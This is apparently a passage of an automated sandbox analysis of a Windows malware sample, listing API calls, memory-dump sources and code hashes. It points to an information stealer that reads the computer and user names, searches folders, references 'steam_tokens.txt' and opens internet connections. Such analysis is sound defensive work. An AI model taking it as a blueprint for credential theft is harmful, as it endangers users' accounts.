                                                                                                                                                                                                                                      • API ID: lstrlen$lstrcpy$InternetOpen
                                                                                                                                                                                                                                      • String ID: steam_tokens.txt
                                                                                                                                                                                                                                      • API String ID: 2934705399-401951677
                                                                                                                                                                                                                                      • Opcode ID: 146202038c27c066fd367394517b8ff31af65033eaae5766017a7843a854a70d
                                                                                                                                                                                                                                      • Instruction ID: 10dd2298c38adeb5e36390c5bfe4eda46295fd03d88468a146a299c80adb3810
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 146202038c27c066fd367394517b8ff31af65033eaae5766017a7843a854a70d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 18F08175D1020866CB18FBB2EC539ED773D9E54348B00425EF81662491EF38A788C6E9
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_u5qk.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: InfoSystemwsprintf
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2452939696-0
                                                                                                                                                                                                                                      • Opcode ID: ae5762f0629c30c52eb39fe9d29b6f6254fbc8fd6ef0ba27fd947bac7523c98c
                                                                                                                                                                                                                                      • Instruction ID: d87a4f6b3ea3f44bdf221dc5e2fa01f01132d118a4d77551e5f155a4815ada85
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ae5762f0629c30c52eb39fe9d29b6f6254fbc8fd6ef0ba27fd947bac7523c98c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FAD012B580020C5BD720DBD0ED49AE9B77DBB44204F4049A5EE1492140EBB96AD58AA5
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                        • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                        • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                        • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                        • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                        • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                        • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                        • Part of subcall function 004097F0: memcmp.MSVCRT ref: 0040980B
                                                                                                                                                                                                                                        • Part of subcall function 004097F0: memset.MSVCRT ref: 0040983E
                                                                                                                                                                                                                                        • Part of subcall function 004097F0: LocalAlloc.KERNEL32(00000040,?), ref: 0040988E
                                                                                                                                                                                                                                      • lstrlen.KERNEL32(00000000), ref: 0040B190
                                                                                                                                                                                                                                      • lstrlen.KERNEL32(00000000), ref: 0040B1A4
                                                                                                                                                                                                                                        • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                                                                                                        • Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
                                                                                                                                                                                                                                        • Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
                                                                                                                                                                                                                                        • Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,04070728), ref: 00404ED9
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_u5qk.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: lstrcpy$lstrlen$lstrcat$AllocInternetLocalOpenmemcmpmemset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 574041509-0
                                                                                                                                                                                                                                      • Opcode ID: 13cddce308538c06651fb638f78a22c734a645341f8300229f816ad67d3302cc
                                                                                                                                                                                                                                      • Instruction ID: df99340f366afcb3d937a345db0e295b6fae9bf0b5ece921659d29683b3ff0c0
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 13cddce308538c06651fb638f78a22c734a645341f8300229f816ad67d3302cc
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6CE114769101189BCF15EBA1DC92EEE773DBF54308F41415EF10676091EF38AA89CBA8
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                        • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                        • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                        • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                        • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                        • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                        • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                      • lstrlen.KERNEL32(00000000), ref: 0040A95A
                                                                                                                                                                                                                                      • lstrlen.KERNEL32(00000000), ref: 0040A96E
                                                                                                                                                                                                                                        • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                                                                                                        • Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
                                                                                                                                                                                                                                        • Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
                                                                                                                                                                                                                                        • Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,04070728), ref: 00404ED9
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_u5qk.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: lstrcpy$lstrlen$lstrcat$InternetOpen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3635112192-0
                                                                                                                                                                                                                                      • Opcode ID: 81f89f89a699842849bbc34ae32ea460001fcc8d8fac6b9a64a259e6930afa28
                                                                                                                                                                                                                                      • Instruction ID: 9f23dc4c71334aa449457ef7a0e8bbad4682aa92b3b7ddf60c673b4dae8ee631
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 81f89f89a699842849bbc34ae32ea460001fcc8d8fac6b9a64a259e6930afa28
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FC9149729102049BCF14FBA1DC51EEE773DBF54308F41425EF50666091EF38AA89CBA9
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                        • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                        • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                        • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                        • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                        • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                        • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                      • lstrlen.KERNEL32(00000000), ref: 0040AC1E
                                                                                                                                                                                                                                      • lstrlen.KERNEL32(00000000), ref: 0040AC32
                                                                                                                                                                                                                                        • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                                                                                                        • Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
                                                                                                                                                                                                                                        • Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
                                                                                                                                                                                                                                        • Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,04070728), ref: 00404ED9
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_u5qk.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: lstrcpy$lstrlen$lstrcat$InternetOpen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3635112192-0
                                                                                                                                                                                                                                      • Opcode ID: 934ca093238930b0b8223b75aa6300b7685426ca81bacad379603acf2cb6e169
                                                                                                                                                                                                                                      • Instruction ID: 57c8c1270dba92ae3db9aa8e51dd660502e79bf125d10b7c0566732e7217b02b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 934ca093238930b0b8223b75aa6300b7685426ca81bacad379603acf2cb6e169
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C07153759102049BCF14FBA1DC52DEE7739BF54308F41422EF506A7191EF38AA89CBA9
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00411550
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_u5qk.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ByteCharMultiWide
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 626452242-0
                                                                                                                                                                                                                                      • Opcode ID: 46fcbcde96b391d8a91c7de27c3ae99c7866997ac8e62baa93d065818f15697d
                                                                                                                                                                                                                                      • Instruction ID: 8f9af232e05b2939ec69b712380268a2006cbed21c6953bc19412128f28bf8b7
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 46fcbcde96b391d8a91c7de27c3ae99c7866997ac8e62baa93d065818f15697d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0641F770A00A289FDB24DB58CC95BDBB7B5BB48702F4091C9A618A72E0D7716EC6CF54
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • VirtualAlloc.KERNEL32(004067AE,004067AE,00003000,00000040), ref: 004060F6
                                                                                                                                                                                                                                      • VirtualAlloc.KERNEL32(00000000,004067AE,00003000,00000040), ref: 00406143
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_u5qk.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4275171209-0
                                                                                                                                                                                                                                      • Opcode ID: a813d0be407c7e97fb4ae0c443796924326960eff0d044c67b11f739482c465e
                                                                                                                                                                                                                                      • Instruction ID: 5341a9e810d76a35e886a0404415562c2a616bd51e9685e0b668c9c894d7d0dc
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a813d0be407c7e97fb4ae0c443796924326960eff0d044c67b11f739482c465e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8341DE34A00209EFCB54CF58C494BADBBB1FF44314F1482A9E95AAB395C735AA91CB84
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B
                                                                                                                                                                                                                                      • lstrcat.KERNEL32(?,00000000), ref: 00412ABA
                                                                                                                                                                                                                                      • lstrcat.KERNEL32(?,04078388), ref: 00412AD8
                                                                                                                                                                                                                                        • Part of subcall function 00412570: wsprintfA.USER32 ref: 00412589
                                                                                                                                                                                                                                        • Part of subcall function 00412570: FindFirstFileA.KERNEL32(?,?), ref: 004125A0
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_u5qk.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: lstrcat$FileFindFirstFolderPathwsprintf
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2699682494-0
                                                                                                                                                                                                                                      • Opcode ID: 97b66dd004d6f90ad905e58048b9a9502992b30ed52752b18a3823e362e2cc13
                                                                                                                                                                                                                                      • Instruction ID: bcc253f25bf78e1a0e90404f031f6467c50b05fa57c941630bc3dd144581bb5c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 97b66dd004d6f90ad905e58048b9a9502992b30ed52752b18a3823e362e2cc13
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8701B97A900608B7CB24FBB0DC47EDA773D9B54705F404189B64956091EE78AAC4CBE5
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004,?,?,?,0040110E,?,?,004136DC), ref: 00401073
                                                                                                                                                                                                                                      • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0,?,?,?,0040110E,?,?,004136DC), ref: 004010B7
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_u5qk.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Virtual$AllocFree
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2087232378-0
                                                                                                                                                                                                                                      • Opcode ID: 1fafdb83e91c72df66fc5e0dfbe5cc959ff82812f546fe48c521c8e5e261a801
                                                                                                                                                                                                                                      • Instruction ID: a2913bed729a6fe358320823385779fc3d8f71f1cc7b0a13f7ab4b92dd49de4a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1fafdb83e91c72df66fc5e0dfbe5cc959ff82812f546fe48c521c8e5e261a801
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 42F027B1641208BBE724DAF4AC59FAFF79CA745B05F304559F980E3390DA719F00CAA4
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetFileAttributesA.KERNEL32(00000000,?,0040E9F4,?,00000000,?,00000000,0041D76E,0041D76B), ref: 0041549F
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_u5qk.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AttributesFile
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3188754299-0
                                                                                                                                                                                                                                      • Opcode ID: 4998d78665a182cfe3f098699877b2c6e461f8b8b8b3f763f93a82d2c629cf92
                                                                                                                                                                                                                                      • Instruction ID: 7a99a0210fb0b6ed6de77f6d22eec219e0a4aedfc9bcf57955c7481c69c901e8
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4998d78665a182cfe3f098699877b2c6e461f8b8b8b3f763f93a82d2c629cf92
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9BF01C70C00608EBCB10EF94C9457DDBB74AF44315F10829AD82957380DB395A85CB89
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B
                                                                                                                                                                                                                                        • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_u5qk.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FolderPathlstrcpy
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1699248803-0
                                                                                                                                                                                                                                      • Opcode ID: c4deb19243b673a040dfd5fdc436edaecc4a41164842cb033ff61c0adf53a60f
                                                                                                                                                                                                                                      • Instruction ID: a2db4f6e5da6e8fb8430e81bb17b8e7aa1674d593408b434fe95881a23a64460
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c4deb19243b673a040dfd5fdc436edaecc4a41164842cb033ff61c0adf53a60f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A8E01231A4034CABDB61DB90DC96FDD776C9B44B05F004295BA0C5A1C0DA70AB858BD1
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00414400: GetProcessHeap.KERNEL32(00000000,00000104,004136EB,0041D6E3), ref: 0041440D
                                                                                                                                                                                                                                        • Part of subcall function 00414400: HeapAlloc.KERNEL32(00000000), ref: 00414414
                                                                                                                                                                                                                                        • Part of subcall function 00414400: GetComputerNameA.KERNEL32(?,00000104), ref: 0041442C
                                                                                                                                                                                                                                        • Part of subcall function 004143C0: GetProcessHeap.KERNEL32(00000000,00000104,00401177,04070898,004136EB,0041D6E3), ref: 004143CD
                                                                                                                                                                                                                                        • Part of subcall function 004143C0: HeapAlloc.KERNEL32(00000000), ref: 004143D4
                                                                                                                                                                                                                                        • Part of subcall function 004143C0: GetUserNameA.ADVAPI32(?,00000104), ref: 004143EC
                                                                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 00401186
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_u5qk.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Heap$Process$AllocName$ComputerExitUser
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1004333139-0
                                                                                                                                                                                                                                      • Opcode ID: c5f9d553daa3d293cc675e83c5a49a4e0c2af81821706314cf681e3291f30800
                                                                                                                                                                                                                                      • Instruction ID: 69e00d56220517d966a61d162f3bbf9e0969f4784ba4f73569e39f9695f87914
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c5f9d553daa3d293cc675e83c5a49a4e0c2af81821706314cf681e3291f30800
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 78E012B5E1070462CA1573B27E06BD7729D5F9930EF40142AFE0497253FD2DE45145BD
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_u5qk.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: malloc
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2803490479-0
                                                                                                                                                                                                                                      • Opcode ID: e14bb29f5c634f52acde74c2c6c6ee0589a433b3a794b1f7692ac0cd2af21e16
                                                                                                                                                                                                                                      • Instruction ID: 71a24ea012b18c325b39d17d5ea825459b0100de2daa219f1012b17ed67d7128
